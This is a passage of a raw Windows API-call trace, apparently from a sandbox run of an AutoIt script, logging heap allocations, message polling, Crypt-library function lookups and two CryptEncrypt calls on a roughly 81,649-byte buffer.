Flags=0x0, Size=0x8) returned 0x6bb408 [0076.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0076.147] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0076.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0076.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.147] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0076.147] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0076.147] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0076.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0076.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0076.148] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0076.148] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df18 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.148] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f100 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5a8 [0076.148] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96a8 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0076.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5a8 [0076.149] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0076.149] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.149] PeekMessageW (in: lpMsg=0x61dd8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61dd8c) returned 0 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.149] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0076.149] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb518, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb518*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0076.149] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a2060 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0076.149] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dab8 [0076.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0076.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96e8 [0076.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0076.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0076.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0076.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0076.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0076.150] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb458 [0076.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a2060 [0076.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb478 [0076.150] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb458 [0076.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb478 [0076.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0076.150] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.150] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.150] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc48 [0076.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0076.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0076.150] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0076.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0076.150] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.150] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0076.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0076.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.150] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.151] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0076.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0076.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0076.151] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.151] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0076.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.151] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.151] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0076.151] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.151] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0076.151] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bf8 [0076.151] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0076.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0076.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0076.151] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.151] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0076.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0076.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0076.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0076.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0076.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.151] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.151] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0076.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb648 [0076.152] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0076.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0076.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0076.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0076.152] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x13eeb, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x13ef0) returned 1 [0076.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4f8 [0076.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0076.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0076.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0076.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0076.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5c8 [0076.153] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4f8 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a2060 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0076.153] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.153] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4f8 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0076.153] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4f8 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb568 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0076.153] CharLowerBuffW (in: lpsz="byte[81649]", cchLength=0xb | out: lpsz="byte[81649]") returned 0xb [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b4b0 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0076.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0076.153] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0076.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0076.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9708 [0076.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b4b0 [0076.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0076.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0076.155] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0076.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0076.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0076.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0076.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.155] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.155] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0076.156] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0076.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0076.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0076.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0076.156] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7d1ce0*, pdwDataLen=0x61e2d8*=0x13eeb, dwBufLen=0x13ef0 | out: pbData=0x7d1ce0*, pdwDataLen=0x61e2d8*=0x13ef0) returned 1 [0076.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0076.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0076.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0076.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0076.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0076.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0076.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb488 [0076.157] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0076.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a2060 [0076.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0076.157] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.157] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0076.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0076.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0076.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0076.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0076.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9708 [0076.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b4b0 [0076.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0076.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0076.157] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.157] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0076.157] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, 